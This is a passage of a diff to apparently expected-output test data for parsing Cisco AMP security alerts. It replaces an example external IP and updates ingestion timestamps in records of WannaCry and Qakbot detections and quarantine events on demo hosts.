4abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1302,7 +1302,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1349,7 +1349,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1363,8 +1363,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798689021Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", + "ingested": "2021-12-09T13:35:47.010723Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1386,7 +1386,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1429,7 +1429,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1443,8 +1443,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798691318Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010728300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1466,7 +1466,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1509,7 +1509,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1523,8 +1523,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798693584Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010733500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1546,7 +1546,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1587,7 +1587,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1597,8 +1597,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798695843Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010738700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1618,7 +1618,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1663,7 +1663,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1673,8 +1673,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798698096Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010744Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -1694,7 +1694,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1741,7 +1741,7 @@ "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1755,8 +1755,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798700344Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", + "ingested": "2021-12-09T13:35:47.010749300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1778,7 +1778,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1825,7 +1825,7 @@ "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1839,8 +1839,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798702596Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", + "ingested": "2021-12-09T13:35:47.010753100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1862,7 +1862,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1903,7 +1903,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1913,8 +1913,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798705016Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010757600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1934,7 +1934,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1979,7 